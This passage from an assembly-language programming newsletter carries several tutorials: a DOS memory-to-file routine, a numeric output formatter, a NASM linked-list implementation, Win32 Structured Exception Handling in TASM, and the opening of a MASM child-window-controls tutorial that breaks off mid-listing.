--- Mem2File ------------------------------------------------ Restart --
es cmp [Blocks], 0 ; if less than 16 Kb, skip this one.
--- Mem2File ------------------------------------------------- Break ---
For people who still remember that "Seg ES" is a legal instruction
(used for a segment override) this might bring back memories.
A86 allows the user to put the segmentation override before the actual
instruction. This way, the operand field looks neater. And it is also
the way in which D86 shows segmentation overrides.
--- Mem2File ------------------------------------------------ Restart --
je >S0
mov cx, 16K
L0: mov ah, 040
int 021
mov ax, ds ; store ds into ax
add dx, 04000 ; next buffer to load data from
IF C add ax, 01000 ; if carry, inc ds
mov ds, ax ; ds:dx now ready for next bufferfull of data
es dec [Blocks]
jnz L0
S0: es cmp [Rest], 0
je >L1
mov ah, 040
es mov cx, [Rest]
int 021
L1: mov ds, es
mov bx, [Handle]
mov ah, 03E
int 021 ; close file
call Credits ; show my ego
mov ax, 04C00
int 021 ; exit to DOS
--- Mem2File -------------------------------------------------- End ----
That's it.
jverhoeven@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Formatted Numeric Output
by Laura Fairhead
Here I am going to present you with a very useful routine for numeric
output. I have been using it myself for sometime and now I think it is
almost perfect.
It consists of 2 basic API's. The first (nuconvs), you call when you
want to change the parameters of the main routine (nuconv). You simply call
it with one DWORD in EAX, this specifies the following:
EAX = SSFFPPRR (hexadecimal value of course)
SS size size of the datum you will be calling the main routine with,
only 3 values are valid:
0=byte
1=word
2=dword
FF field size of a field in which to right-justify the number,
if this is = 0 then there is no right-justification you
only get the number
PP pad the ASCII value of the character to use to right-justify
the number in the field of output
RR radix the radix to output the number in
Once you've set the control parameters you can call the main routine
(nuconv) freely to do the work. You call the main routine with ES:DI set
to where the output is to be stored, and the value to be output in AL or
AX or EAX (depending on what data size you set).
I use the word 'output' here which might conjure up images of the screen,
but in fact what we are doing here is writing all the ASCII to memory.
This is much more powerful than incorporating all that OS/application
specific nonsense, and it really doesn't cost much overhead at all (in
fact this is the way C does it and even though I **HATE** C, here it is
right on the mark;)
Here is the code:
================START OF CODE==============================================
;
;nuconvs- set control parameters for 'nuconv'
;
; !! this must be called at least once before calling nuconv
;
;entry: EAX=SSFFPPRR (hex digits)
;
; where: SS=data size (0=byte,1=word,2=dword)
; FF=field size (0=none)
; PP=pad char
; RR=radix (2-16)
;
; !! these parameters must be set correctly by the application
; !! they are not validated in anyway and invalid parameters
; !! will cause undefined operation
;
;exit: (all registers preserved)
;
nuconvs PROC NEAR
MOV DWORD PTR CS:[nuradix],EAX
RET
nuconvs ENDP
;
;control parameters
;
; !! these absolutely must be in the below order due to the way the above
; routine works
;
nuradix DB ? ;output radix
nupad DB ? ;pad character
nufld DB ? ;field size
nudsiz DB ? ;data size
;
;nuconv- output value in accumalator -> ES:DI
;
; !! see 'nuconvs' header for more information
;
;entry: AL|AX|EAX=value to output
; ES:DI=address to write output data
;
; size of accumulator that is used depends on what the current data
; size is ( as specified by a previous call to 'nuconvs' )
;
;
;exit: DI=updated to offset of last character + 1
;
; (all other registers preserved)
;
nuconv PROC NEAR
;
;all registers are going to be preserved
;
PUSH DS
PUSH EAX
PUSH EBX
PUSH CX
PUSH EDX
;
;save some CS: overrides
;
PUSH CS
POP DS
;
;initialise
;
; set EBX =radix
; CX =fieldsize
;
; also we zero pad out the datum passed so it fills EAX
;
XOR EBX,EBX
CMP BL,BYTE PTR DS:[nudsiz]
JNP SHORT ko1
JS SHORT ko0
MOV AH,0
ko0: DEC BX
AND EAX,EBX
INC BX
ko1:
MOV BL,BYTE PTR DS:[nuradix]
MOV CH,0
MOV CL,BYTE PTR DS:[nufld]
;
;calculate digits and push to stack
;
; EAX is divided and modulus taken which is the standard way,
; loop exits when it reaches 0 or the field size is hit
; notice that if CX=0 on entry to this then the field size
; will be effectively unbounded
;
nulop0: XOR EDX,EDX
DIV EBX
PUSH DX
AND EAX,EAX
LOOPNZ nulop0
;
;'output' the field padding
;
; the number of padding characters is normally the value
; now in CX (ie: fieldsize - digits ). however no pad chars
; should be output if field size = 0. i think the check here
; for this is nice and tight (read the code...)
;
MOV BX,CX
NEG BX
JNS SHORT ko
MOV AL,BYTE PTR DS:[nupad]
REP STOSB
ko:
;
;'output' all the digits
;
; CX is set to the number of digits on the stack we have to output
; ie: fieldsize - ( fieldsize - digits )
;
MOV CH,0
MOV CL,BYTE PTR DS:[nufld]
ADD CX,BX
;
; now we pop off those #CX digits translating into ASCII using a nice
; variation of the traditional speed method
;
MOV BX,OFFSET nudat
nulop1: POP AX
XLAT
STOSB
LOOP nulop1
;
; restore all registers and exit (in case it wasn't obvious!)
;
POP EDX
POP CX
POP EBX
POP EAX
POP DS
RET
;
nudat DB "0123456789ABCDEF"
;
nuconv ENDP
==================END OF CODE==============================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Linked Lists in ASM
by mammon_
Assembly language is notorious for being low-level; to wit, it lacks many of
the features in higher-level languages which make programming easier. In the
course of my work in the visasm project I have put quite a bit of time into
working on exactly which higher language features are important and which, in a
nutshell, are swill.
One of the areas in which assembly language is lacking is the use of dynamic
structures. Pointer manipulation in asm is simple and clear for up to one
level of redirection; further redirection causes the code to quickly become a
confusion of register juggling and indirect addressing. As a result,
implementing even a simple linked list in assembly language can be tedious
enough to make one rewrite the project in C.
In this article I have undertaken an implementation of a linked list in NASM;
the implementation is generic enough to support more complex data structures,
and should port to other assemblers with few changes.
To begin with, one must define the memory allocation routines for use in the
application; I have chosen Win32 for convenience. The routines defined below
are for local heap allocation and for the Win32 console interface to allow the
use of STDOUT on the console.
;=========================================================Win32 API Definitions
STD_INPUT_HANDLE EQU -10 ;nStdHandle types
STD_OUTPUT_HANDLE EQU -11
STD_ERROR_HANDLE EQU -12
EXTERN AllocConsole ;BOOL AllocConsole()
EXTERN GetStdHandle ;HANDLE GetStdHandle( nStdHandle )
EXTERN WriteConsoleA ;HANDLE hConsole, lpBuffer, Num2Write, lpWritten,NULL
EXTERN ExitProcess ;UINT ExitCode
EXTERN GetProcessHeap ;
EXTERN HeapAlloc ;HANDLE hHeap,DWORD dwFlags, DWORD dwBytes:ret ptr
EXTERN HeapFree ;HANDLE hHeap,DWORD dwFlags, LPVOID lpMem
EXTERN HeapReAlloc ;HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,DWORD dwBytes
EXTERN HeapDestroy ;HANDLE hHeap
%define HEAP_NO_SERIALIZE 0x00000001
%define HEAP_GROWABLE 0x00000002
%define HEAP_GENERATE_EXCEPTIONS 0x00000004
%define HEAP_ZERO_MEMORY 0x00000008
%define HEAP_REALLOC_IN_PLACE_ONLY 0x00000010
%define HEAP_TAIL_CHECKING_ENABLED 0x00000020
%define HEAP_FREE_CHECKING_ENABLED 0x00000040
%define HEAP_DISABLE_COALESCE_ON_FREE 0x00000080
%define HEAP_CREATE_ALIGN_16 0x00010000
%define HEAP_CREATE_ENABLE_TRACING 0x00020000
%define HEAP_MAXIMUM_TAG 0x0FFF
%define HEAP_PSEUDO_TAG_FLAG 0x8000
%define HEAP_TAG_SHIFT 16
;===========================================================End API Definitions
In addition, it is useful to define a few common routines for use later:
;==============================================================Utility Routines
[section data class=DATA use32] ;set up the segments early
%macro STRING 2+
%1: db %2
.end:
%define %1.length %1.end - %1
%endmacro
[section code class=CODE use32]
GetConsole:
;GetConsole()
[section data]
hConsole DD 0
[section code]
call AllocConsole
push dword STD_OUTPUT_HANDLE
call GetStdHandle
mov [hConsole], eax
xor eax, eax
ret
puts:
;puts( ptrString, NumBytes )
[section data]
NumWrote DD 0
[section code]
%define _ptrString ebp + 8
%define _strlen ebp + 12
push ebp
mov ebp,esp
push eax
push dword 0
push dword NumWrote
mov eax, [ _strlen ]
push dword eax
mov eax, [ _ptrString ]
push dword eax
push dword [hConsole]
call WriteConsoleA
pop eax
mov esp, ebp
pop ebp
ret 8
;==========================================================End Utility Routines
The STRING macro is particular interesting; it allows one to define a string
in the data segment as
STRING label, 'contents of string',0Dh,0Ah
while defining the constant label.length as the total length of the string.
This will come in handy during the many calls to puts, which is used to write
to the Win32 console. Puts has the syntax
puts( lpString, strLength )
and returns the result of WriteConsole, a BOOL value. GetConsole is a routine
provided to move the Win32 console allocation code out of the main program; it
takes no parameters and defines the hConsole handle.
The linked list implementation has been designed to be extendable; the routine
names are prefaced with underscores to avoid filling up the namespace of the
linked list application, and the routines themselves are generic enough to be
called from higher-level Stack, Queue, and List implementations. The Linked
List interface is as follows:
ptrHead _create_list( hHeap, NodeSize )
void _delete_list( hHeap, ptrHead)
ptrNode _add_node( hHeap, ptrPrev, NodeSize )
void _delete_node( hHeap, ptrPrev, ptrNode )
void _set_node_data( ptrNode, NodeOffset, data )
DWORD data _get_node_data( ptrNode, NodeOffset )
The names of the routines should make their intent apparent; note however that
NodeSize is assumed to be the size of a LISTSTRUCT structure.
;====================================================Linked List Implementation
[section data]
;Define .next as offset Zero for use in generic functions
struc _llist
.next: resd 1 ;this is basically a constant
endstruc
;Macro to ensure that .next is always at offset zero in user-defined lists
%macro LISTSTRUCT 1
struc %1
.next: resd 1
%endmacro
%macro END_LISTSTRUCT 0
endstruc
%endmacro
[section code]
;Note that these assume an LISTSTRUCT base type
_create_list:
; ptrHead_create_list( hHeap, NodeSize )
%define _hHeap ebp + 8
%define _ListSize ebp + 12
ENTER 0 , 0
push dword [_ListSize] ;size of LISTSTRUCT
push dword HEAP_ZERO_MEMORY ;FLAG for HeapAlloc
push dword [_hHeap] ;Heap being used
call HeapAlloc
test eax, eax
jz .Error ;Alloc failed!
mov [eax + _llist.next], dword 0 ;.next pointer = NULL
.Exit: LEAVE ;eax = ptrHead
ret 8
.Error: xor eax, eax ;error = return NULL
jmp .Exit
_delete_list:
; _delete_list( hHeap, ptrHead)
%define _hHeap ebp + 8
%define _ptrHead ebp + 12
ENTER 0, 0
push eax
push ebx ;save registers
mov eax, [_ptrHead] ;eax = addr of list head node
.DelNode:
mov ebx, [eax + _llist.next] ;ebx = [eax].next
push eax ;free addr in eax
push dword 0 ;FLAG
push dword [_hHeap] ;local heap
call HeapFree
test ebx, ebx ;is [eax].next == NULL?
jz .Exit ;if yes then done
mov eax, ebx ;loop until done
jmp .DelNode
.Exit: pop ebx
pop eax
LEAVE
ret 8
_add_node:
; ptrNode _add_node( hHeap, ptrPrev, NodeSize )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ListSize ebp + 16
ENTER 0, 0
push edx ;HeapAlloc kills edx!!
push ebx
push ecx ;save registers
mov ebx, [_ptrPrev] ;ebx = node to add after
push dword [_ListSize] ;size of node
push dword HEAP_ZERO_MEMORY ;FLAG
push dword [_hHeap] ;local heap
call HeapAlloc
test eax, eax
jz .Error ;alloc failed!
mov ecx, eax ;note -- eax = ptrNew
add ecx, _llist.next ;ecx = ptrNew.next
mov [ecx], ebx ;ptrNew.next = ptrPrev.next
add ebx, _llist.next ;note -- ebx = ptrPrev
mov [ebx], eax ;ptrPrev.next = ptrNew
.Exit: pop ecx
pop ebx
pop edx
LEAVE
ret 12
.Error: xor eax, eax ;return NULL on failure
jmp .Exit
_delete_node:
; _delete_node( hHeap, ptrPrev, ptrNode )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ptrNode ebp + 16
ENTER 0, 0
push ebx
mov eax, [_ptrNode + _llist.next] ;eax = ptrNode.next
mov ebx, [_ptrPrev] ;
mov [ebx + _llist.next], eax ;ptrPrev.next = ptrNode.next
push dword [_ptrNode] ;free ptrNode
push dword 0 ;FLAG
push dword [_hHeap] ;local heap
call HeapFree
pop ebx
LEAVE
ret 12
_set_node_data:
; _set_node_data( ptrNode, NodeOffset, data )
%define _ptrNode ebp + 8
%define _off ebp + 12
%define _data ebp + 16
ENTER 0, 0
push eax
push ebx
mov eax, [_ptrNode] ;eax = ptrNode
add eax, [ _off ] ;eax = ptrNode.offset
mov ebx, [_data] ;ebd = data
mov [eax], ebx ;ptrNode.offset = data
pop ebx
pop eax
LEAVE
ret 12
_get_node_data:
; DWORD data _get_node_data( ptrNode, NodeOffset )
%define _ptrNode ebp + 8
%define _off ebp + 12
ENTER 0, 0
mov eax, [_ptrNode] ;eax = ptrNode
add eax, [_off] ;eax = ptrNode.offset
mov eax, [eax] ;return [ptrNode.offset]
LEAVE
ret 8
;===============================================================End Linked List
The LISTSTRUCT structure is perhaps the most crucial part of this implemen-
tation. In NASM, a structure is simply a starting address with local labels
defined as constants which equal the offset of the local label from the start
of the structure. Thus, in the structure
struc MyStruc
.MyVar resd 1
.MyVar2 resd 1
.MyVar3 resd 1
.MyByte resb 1
endstruc
the constant MyStruc.MyVar has a value of 0 [0 bytes from the start of the
structure], MyStruc.MyVar2 has a value of 4, MyStruc.MyVar3 has a value of 8,
MyStruc.MyByte has a value of 12, and MyStruc_size [defined as the offset of
the "endstruc" directive] has a value of 13. Note that in NASM, the name of a
structure instance determines the address in memory of the instance [i.e., it
is a simple code label], while the constants defined in the structure
definition allow access to offsets from that address.
What this means is that structures in NASM can be defined and never instant-
iated, allowing the convenient use of the structure constants for dynamic
memory structures such as classes and linked list nodes. The above code uses
the LISTSTRUCT macro to force all linked list nodes to have a ".next" member;
this also allows the use of the constant "_llist.next" in the linked list
routines to avoid having to pass the offset of the ".next" member for a node.
The implementation routines should be pretty straight forward. _create_list
allocates memory from the local heap of the size of one list node [determined
by the parameter NodeSize passed to _create_list] and returns the address of
the allocated memory; since this node is assumed to be the list "head", the
.next member is set to NULL. _delete_list is passed the address of the head
node of the list; it saves the address in the .next member of the node and
then frees the memory allocated to the node, repeating this with each .next
link until the .next member is NULL [indicating an end of list].
_add_node is used to insert a node into an existing list; it is passed the
address of the node after which the new node is to be inserted. The .next
member of this node is moved into the .next member of the new node, and
replaced with the address of the new node. Thus, if before insertion the list
had the structure
.next [Node1] --> .next [Node2] --> .next [NULL]
.data NULL .data Node1 .data Node2
then it would have the following structure after insertion following Node1:
.next [Node1] --> .next [NewNode] --> .next [Node2] --> .next [NULL]
.data NULL .data Node1 .data NewNode .data Node2
_del_node does the opposite of _add_node; it moves the .next member of the
node to be deleted into the .next member of the preceding node, then frees the
specified node.
Note that both _del_node and _add_node are designed to be as generic as
possible and make no assumptions regarding the linked list structure; thus in
a double linked list of the format
struc DLLIST
.next
.prev
.data
endstruc
one could front-end the Delete function as follows:
DelNode:
push dword eax ;eax = Node to delete
push dword [eax + DLLIST.prev]
push hHeap
call _del_node
ret 8
The other linked list routines can be provided with similar front-ends to take
care of common heap handles, list sizes, and member assignments.
Both the _set_node_data and the _get_node_data routines are basic pointer
manipulations added for code clarity. Each could be rewritten inline; for
example, the _get_node_data routine can be implemented as
add ebx, offset
mov eax, [ebx]
assuming ebx holds the node to be accessed and "offset" is the offset [or
constant] of the node member to be accessed.
Below is a simple program which makes a four-node linked list of the format
.next Node1 --> .next Node2 --> .next Node3 --> .next NULL
.prev NULL <-- .prev Head <-- .prev Node1 <-- .prev Node2
.data NULL .data 'node1' .data 'node2' .data 'node3'
Note the use of the NewNode routine, which provides a front-end to _add_node
which sets the .prev member for the new node. One brief caveat, the example
does not delete the list, as the Win32 heap is deallocated on program
termination; neither is there any substantial error checking in the sample.
;=======================================================Linked List Application
[section data]
hHeap dd 0
ptrHead dd 0
STRING strData1, 'node 1',0Dh,0Ah
STRING strData2, 'node 2',0Dh,0Ah
STRING strData3, 'node 3',0Dh,0Ah
STRING strStart, 'Creating List',0Dh,0Ah
STRING strDone, 'Finished!',0Dh,0AH,'Printing Data...',0Dh,0Ah
STRING strErr, 'Error!',0Dh, 0AH
LISTSTRUCT llist
.prev resd 0
.data resd 0
END_LISTSTRUCT
[section code]
Error:
push dword strErr.length
push dword strErr
call puts
jmp Exit
..start:
call GetProcessHeap
mov [hHeap], eax
call GetConsole
push dword strStart.length
push dword strStart
call puts
CreateList:
push dword llist_size
push dword [hHeap]
call _create_list
test eax, eax
jz Error
mov [ptrHead], eax
push dword 0
push dword llist.data
push eax
call _set_node_data ;set ptrHead.data to NULL
push dword 0
push dword llist.prev
push eax
call _set_node_data ;set ptrHead.prev to NULL
call NewNode ;create Node1
test eax, eax
jz ListDone
push dword strData1
push dword llist.data
push eax
call _set_node_data ;set Node1.data to 'node1'
call NewNode ;create Node2
test eax, eax
jz ListDone
push dword strData2
push dword llist.data
push eax
call _set_node_data ;set Node2.data to 'node2'
call NewNode ;create Node3
test eax, eax
jz ListDone
push dword strData3
push dword llist.data
push eax
call _set_node_data ;set Node3.data to 'node3'
ListDone:
push dword strDone.length
push dword strDone
call puts
mov ebx, [ptrHead]
PrintList:
push dword _llist.next
push ebx
call _get_node_data ;could have been mov eax,[ebx]
test eax, eax ;if ptrCurrent.next == NULL exit
jz Exit ; [end of list]
mov ebx, eax ;save ptrNode
push dword strData1.length ;push length for call to puts
push dword llist.data
push ebx
call _get_node_data ;get ptrNode.data
push dword eax ;push string for call to puts
call puts
jmp PrintList ;loop
Exit:
push dword 0
call ExitProcess
NewNode:
ENTER 0, 0
push edx
mov edx, eax ;save previous node
push dword llist_size
push dword eax
push dword [hHeap]
call _add_node
test eax, eax
jz .Done
push dword eax
push dword llist.next
push dword edx
call _set_node_data ;set ptrPrev.next to ptrNew
push edx
push dword llist.prev
push eax
call _set_node_data ;set ptrNew.prev to ptrPrev
push dword 0
push dword llist.next
push eax
call _set_node_data ;set PtrNew.next to NULL
.Done pop edx
LEAVE ;eax is still set to ptrNew
ret
;==========================================================================EOF
As mentioned earlier, this is a generic implementation of dynamic structures
designed with linked lists in mind. The macros and routines may be included in
a header file such as llist.h and used to automate the creation of dynamic
memory structures in future projects. In addition, further macros and routines
can be added to provide specific implementations of Single Linked Lists,
Double Linked Lists, Circular Lists, Stacks, Queues, and Deques.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Structured Exception Handling under Win32
by Chris Dragan
Structured Exception Handling is a powerful feature of all Win32 platforms
that allows a program to recover from any critical errors like BOUND, divide
overflow, page missing or general protection fault. It is documented only for
C-level usage (try-except/finally syntax), and no documentation for low level
languages exists. Therefore I will try to show how to use it.
The starting point for Structured Exception Handling, SEH, is the Thread
Info Block. TIB, as almost all the other structures, is described in winnt.h
file that comes with PlatformSDK.
struc NT_TIB
ExceptionList dd ? ; Used by SEH
StackBase dd ? ; Used by functions to check for
StackLimit dd ? ; stack overflow
SubSystemTib dd ? ; ?
FiberDataOrVersion dd ? ; ?
ArbitraryUserPointer dd ? ; ?
Self dd ? ; Linear address of the TIB
ends
TIB is accessible at address fs:0. NT_TIB.Self contains linear address of TIB,
base of FS segment.
When an exception occurs, the system uses (dword)fs:0, NT_TIB.ExceptionList
to find an exception handler and execute it. The exception list entry is very
simple:
struc E_L_ENTRY
Next dd ? ; Points to next entry in the list
ExceptionHandler dd ? ; User callback - exception hook
Optional db X dup (?) ; Exception Handler data
EntryTerminator dd -1 ; Optional
ends
C compilers usually keep some additional information in E_L_ENTRY.Optional
field of varying size and usually terminated with (dword)-1. Both .Optional
and .EntryTerminator fields are not required.
Before calling an exception handler, the exception manager pushes
ExceptionRecord and ContextRecord onto the stack. These structures identify an
exception and processor state before it. The exception manager adds also its
own entry to the exception list.
Exception handler is in fact a typical callback. It is not however
installed by any API function, but appended in E_L_ENTRY into the exception
list.
EXCEPTION_DISPOSITION __cdecl _except_handler (
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext
);
The exception handler uses C-style calling convention, it does not release
arguments while returning. The most important parameters are ExceptionRecord
and ContextRecord, described at the end of this text, that point to the pushed
corresponding structures. I do not have yet any idea what is the purpose of
EstablisherFrame and DispatcherContext.
struc EXCEPTION_RECORD
ExceptionCode dd ? ; See at the end of this text
ExceptionFlags dd ?
ExceptionRecord dd ? ; ?
ExceptionAddress dd ? ; Linear address of faulty instruction
NumberParameters dd ? ; Corresponds to the field below
ExceptionInformation dd 15 dup (?) ; ?
ends
Exception flags are:
EXCEPTION_NONCONTINUABLE = 1
EXCEPTION_UNWINDING = 2
EXCEPTION_UNWINDING_FOR_EXIT = 4
The exception handler has two possible ways of proceeding. It can return to
the exception manager, or it can unwind the stack and continue the program. In
the first case it has to return one of the following values:
enum EXCEPTION_DISPOSITION \
ExceptionContinueExecution = 0,\
ExceptionContinueSearch = 1,\
ExceptionNestedException = 2,\
ExceptionCollidedUnwind = 3
The value of zero forces the exception manager to continue the program
at saved in context cs:eip, which may be altered by the exception handler. The
value of 1 causes the exception manager to call another exception handler in
the exception list. Values 2 and 3 inform the exception manager that an error
occured - an exception-in-exception happened, or the handler wanted to unwind
the stack during another handler of higher instance was doing this already.
The other case can be determined if one of .ExceptionFlags is
EXCEPTION_UNWINDING or EXCEPTION_UNWINDING_FOR_EXIT.
While appending a new exception handler to the exception list, a common
practice is to push new E_L_ENTRY onto the stack. This way unwinding the stack
can be done simply by skipping the exception manager's entry and restoring the
stack pointer.
Here is an example of exception handling.
----Start-of-file-------------------------------------------------------------
ideal
p686n
model flat, stdcall
O equ <offset>
struc EXCEPTION_RECORD
ExceptionCode dd ?
ExceptionFlags dd ?
ExceptionRecord dd ?
ExceptionAddress dd ?
NumberParameters dd ?
ExceptionInformation dd 15 dup (?)
ends
procdesc wsprintfA c :dword, :dword, :dword:?
procdesc MessageBoxA :dword, :dword, :dword, :dword
procdesc ExitProcess :dword
udataseg
ExCode dd ?
szCode db 12 dup (?)
dataseg
szWindowTitle db 'Exception code', 0
szFormat db '%0X', 0
codeseg
proc main
; Install exception handler
push O ExceptionHandler
push [dword fs:0] ; E_L_ENTRY.Next
mov [fs:0], esp ; Append new E_L_ENTRY
; Cause Invalid Opcode exception
ud2
; Display exception code and quit
_Continue: call wsprintfA, O szCode, O szFormat, [ExCode]
call MessageBoxA, 0, O szCode, O szWindowTitle, 0
call ExitProcess, 0
endp
proc ExceptionHandler c ExceptionRecord, EF, ContextRecord, DC
; Save exception code
mov eax, [ExceptionRecord]
mov ecx, [(EXCEPTION_RECORD eax).ExceptionCode]
mov [ExCode], ecx
; Unwind the stack
mov eax, [fs:0] ; Exception Manager's entry
mov esp, [eax] ; Our entry
pop [dword fs:0] ; Restore fs:0
add esp, 4 ; Skip ExHandler address
jmp _Continue
endp
end main
----End-of-file---------------------------------------------------------------
The above source should be compiled with TASM 5.0r or later like this:
tasm32 /ml except.asm
tlink32 /x /Tpe /aa /c /V4.0 except.obj,,, LIBPATH\import32.lib
And here are other important constants and structures, all defined in
winnt.h PlatformSDK file.
Exception codes:
----------------
STATUS_SEGMENT_NOTIFICATION = 040000005h
STATUS_GUARD_PAGE_VIOLATION = 080000001h
STATUS_DATATYPE_MISALIGNMENT = 080000002h
STATUS_BREAKPOINT = 080000003h
STATUS_SINGLE_STEP = 080000004h
STATUS_ACCESS_VIOLATION = 0C0000005h
STATUS_IN_PAGE_ERROR = 0C0000006h
STATUS_INVALID_HANDLE = 0C0000008h
STATUS_NO_MEMORY = 0C0000017h
STATUS_ILLEGAL_INSTRUCTION = 0C000001Dh
STATUS_NONCONTINUABLE_EXCEPTION = 0C0000025h
STATUS_INVALID_DISPOSITION = 0C0000026h
STATUS_ARRAY_BOUNDS_EXCEEDED = 0C000008Ch
STATUS_FLOAT_DENORMAL_OPERAND = 0C000008Dh
STATUS_FLOAT_DIVIDE_BY_ZERO = 0C000008Eh
STATUS_FLOAT_INEXACT_RESULT = 0C000008Fh
STATUS_FLOAT_INVALID_OPERATION = 0C0000090h
STATUS_FLOAT_OVERFLOW = 0C0000091h
STATUS_FLOAT_STACK_CHECK = 0C0000092h
STATUS_FLOAT_UNDERFLOW = 0C0000093h
STATUS_INTEGER_DIVIDE_BY_ZERO = 0C0000094h
STATUS_INTEGER_OVERFLOW = 0C0000095h
STATUS_PRIVILEGED_INSTRUCTION = 0C0000096h
STATUS_STACK_OVERFLOW = 0C00000FDh
STATUS_CONTROL_C_EXIT = 0C000013Ah
STATUS_FLOAT_MULTIPLE_FAULTS = 0C00002B4h
STATUS_FLOAT_MULTIPLE_TRAPS = 0C00002B5h
STATUS_ILLEGAL_VLM_REFERENCE = 0C00002C0h
Context flags:
--------------
CONTEXT_i386 = 000010000h
CONTEXT_i486 = 000010000h
CONTEXT_CONTROL = (CONTEXT_i386 or 1) ; SS:ESP, CS:EIP, EFLAGS, EBP
CONTEXT_INTEGER = (CONTEXT_i386 or 2) ; EAX, EBX,..., ESI, EDI
CONTEXT_SEGMENTS = (CONTEXT_i386 or 4) ; DS, ES, FS, GS
CONTEXT_FLOATING_POINT = (CONTEXT_i386 or 8) ; 387 state
CONTEXT_DEBUG_REGISTERS = (CONTEXT_i386 or 16); DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = (CONTEXT_i386 or 32); cpu specific extensions
CONTEXT_FULL = (CONTEXT_CONTROL or CONTEXT_INTEGER or\
CONTEXT_SEGMENTS)
Context structure:
------------------
struc CONTEXT
ContextFlags dd ? ; CONTEXT_??? flags
Dr0 dd ? ; Debug registers
Dr1 dd ?
Dr2 dd ?
Dr3 dd ?
Dr6 dd ?
Dr7 dd ?
ControlWord dd ? ; FPU context
StatusWord dd ?
TagWord dd ?
ErrorOffset dd ?
ErrorSelector dd ?
DataOffset dd ?
DataSelector dd ?
RegisterArea dt 8 dup (?)
Cr0NpxState dd ?
SegGs dd ? ; Segment registers
SegFs dd ?
SegEs dd ?
SegDs dd ?
Edi dd ? ; Integer registers
Esi dd ?
Ebx dd ?
Edx dd ?
Ecx dd ?
Eax dd ?
Ebp dd ? ; Control registers
Eip dd ?
SegCs dd ?
EFlags dd ?
Esp dd ?
SegSs dd ?
ExtendedRegisters db 512 dup (?)
ends
Additional word
---------------
This article was posted on comp.lang.asm.x86.
Especially thanks to Michael Tippach for pointing out some exception flags.
My web page is at http://ams.ampr.org/cdragan/
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Child Window Controls
by Iczelion
In this tutorial, we will explore child window controls which are very
important input and output devices of our programs.
Theory
------
Windows provides several predefined window classes which we can readily use
in our own programs. Most of the time we use them as components of a dialog
box so they're usually called child window controls. The child window
controls process their own mouse and keyboard messages and notify the
parent window when their states have changed. They relieve the burden from
programmers enormously so you should use them as much as possible. In this
tutorial, I put them on a normal window just to demonstrate how you can
create and use them but in reality you should put them in a dialog box.
Examples of predefined window classes are button, listbox, checkbox, radio
button,edit etc.
In order to use a child window control, you must create it with
CreateWindow or CreateWindowEx. Note that you don't have to register the
window class since it's registered for you by Windows. The class name
parameter MUST be the predefined class name. Say, if you want to create a
button, you must specify "button" as the class name in CreateWindowEx. The
other parameters you must fill in are the parent window handle and the
control ID. The control ID must be unique among the controls. The control
ID is the ID of that control. You use it to differentiate between the
controls.
After the control was created, it will send messages notifying the parent
window when its state has changed. Normally, you create the child windows
during WM_CREATE message of the parent window. The child window sends
WM_COMMAND messages to the parent window with its control ID in the low
word of wParam, the notification code in the high word of wParam, and its
window handle in lParam. Each child window control has different
notification codes, refer to your Win32 API reference for more information.
The parent window can send commands to the child windows too, by calling
SendMessage function. SendMessage function sends the specified message with
accompanying values in wParam and lParam to the window specified by the
window handle. It's an extremely useful function since it can send messages
to any window provided you know its window handle.
So, after creating the child windows, the parent window must process
WM_COMMAND messages to be able to receive notification codes from the child
windows.
Application
-----------
We will create a window which contains an edit control and a pushbutton.
When you click the button, a message box will appear showing the text you
typed in the edit box. There is also a menu with 4 menu items:
1. Say Hello -- Put a text string into the edit box
2. Clear Edit Box -- Clear the content of the edit box
3. Get Text -- Display a message box with the text in the edit box
4. Exit -- Close the program.
.386
.model flat,stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
ClassName db "SimpleWinClass",0
AppName db "Our First Window",0
MenuName db "FirstMenu",0
ButtonClassName db "button",0
ButtonText db "My First Button",0
EditClassName db "edit",0
TestString db "Wow! I'm in an edit box now",0
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
hwndButton HWND ?
hwndEdit HWND ?
buffer db 512 dup(?) ; buffer to store the text
retrieved from the edit box
.const
ButtonID equ 1 ; The control ID of the
button control
EditID equ 2 ; The control ID of the
edit control
IDM_HELLO equ 1
IDM_CLEAR equ 2
IDM_GETTEXT equ 3
IDM_EXIT equ 4
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess,eax
WinMain proc
hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_BTNFACE+1
mov wc.lpszMenuName,OFFSET MenuName
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
